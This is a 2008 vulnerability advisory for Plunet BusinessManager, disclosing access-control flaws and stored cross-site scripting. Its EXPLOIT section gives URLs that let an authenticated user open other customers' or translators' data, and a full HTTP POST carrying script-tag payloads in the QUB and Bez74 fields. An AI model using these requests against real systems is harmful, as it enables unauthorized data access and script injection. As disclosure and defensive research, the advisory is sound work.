Plunet BusinessManager Information Disclosure / XSS

`Secure Network - Security Research Advisory  
  
Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting   
vulnerabilities.  
Systems affected: Plunet BusinessManager  
Systems not affected:  
Severity: High  
Local/Remote: Remote  
Vendor URL: http://www.plunet.de  
Author(s): Matteo Ignaccolo [email protected] - Gabriele Zanoni   
[email protected]  
Relates to:   
Vendor disclosure: 23/09/2008  
Vendor acknowledged:  
Vendor patch release:  
Public disclosure: 23/12/2008  
Advisory number: SN-2008-04  
Advisory URL: http://www.securenetwork.it/advisories/  
  
*** SUMMARY ***  
  
Plunet BusinessManager is a powerful software for traslation companies, that  
offers on a single platform a solution to handle customers, traslators,   
document management, data, order management e processing.  
Since Plunet BusinessManager suffers of incorrect validation of some input   
forms, Stored Cross Site Scripting attacks are allowed.  
Moreover customers and traslators can access data and file not related to   
them.  
  
*** VULNERABILITY DETAILS ***  
  
The application fails to perform a correct access control to data and file.  
Any user (Customers and Traslators) colud retrive and alter data and  
file not related to him. Also, an user could be easily enumerate all Company  
customers.  
  
The application fails to validate QUB and Bez74 parameters, so stored Cross   
Site  
Scripting attacks are possible.  
  
  
*** EXPLOIT ***  
  
An authenticated Customer could use the following URL to access to other  
Customers private area.  
  
http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/  
<CUSTOMER-ID>   
  
An authenticated Traslator could use the following URL to access Orders not  
related to him  
  
http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/  
C-00042/PRM  
  
An authenticated traslator could use the following URL to access to Jobs not  
related to him  
  
http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs  
  
Stored Cross Site Scripting  
  
POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1  
Host: <HOSTNAME> or IP  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16)   
Gecko/20080718  
Ubuntu/8.04 (hardy) Firefox/2.0.0.16  
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,  
text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Proxy-Connection: keep-alive  
Referer: http://<hostname or IP>/pagesUTF8/auftrag_allgemeinauftrag.jsp  
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1085  
  
TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&  
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29  
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14  
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&  
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&  
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&  
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&  
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&  
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&  
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=  
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&  
CheckXYZ=Send&yOffsetScroll=0  
  
  
*** FIX INFORMATION ***  
  
No patch is currently available.  
  
*** WORKAROUNDS ***  
  
No workaround is available, but some application firewalls and IPS can be   
reconfigured to thwart the attack.  
  
*********************  
*** LEGAL NOTICES ***  
*********************  
  
Secure Network (www.securenetwork.it) is an information security company,   
which provides consulting and training services, and engages in security   
research and development.   
  
We are committed to open, full disclosure of vulnerabilities, cooperating  
whenever possible with software developers for properly handling disclosure.  
  
This advisory is copyright 2008 Secure Network S.r.l. Permission is   
hereby granted for the redistribution of this alert, provided that it is  
not altered except by reformatting it, and that due credit is given. It   
may not be edited in any way without the express consent of Secure Network   
S.r.l. Permission is explicitly given for insertion in vulnerability   
databases and similars, provided that due credit is given to Secure Network.  
  
The information in the advisory is believed to be accurate at the time of   
publishing based on currently available information. This information is  
provided as-is, as a free service to the community by Secure Network   
research staff. There are no warranties with regard to this information.   
Secure Network does not accept any liability for any direct, indirect,  
or consequential loss or damage arising from use of, or reliance on,  
this information.  
  
If you have any comments or inquiries, or any issue with what is reported   
in this advisory, please inform us as soon as possible.  
  
E-mail: [email protected]  
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc  
Phone: +39 02 24 12 67 88  
  
  
--   
Dott. Ing. Matteo Ignaccolo  
  
Secure Network S.r.l.  
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia  
Tel: +39 02.24126788  
email: [email protected]  
web: www.securenetwork.it  
--   
Dott. Ing. Matteo Ignaccolo  
  
Secure Network S.r.l.  
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia  
Tel: +39 02.24126788  
email: [email protected]  
web: www.securenetwork.it  
`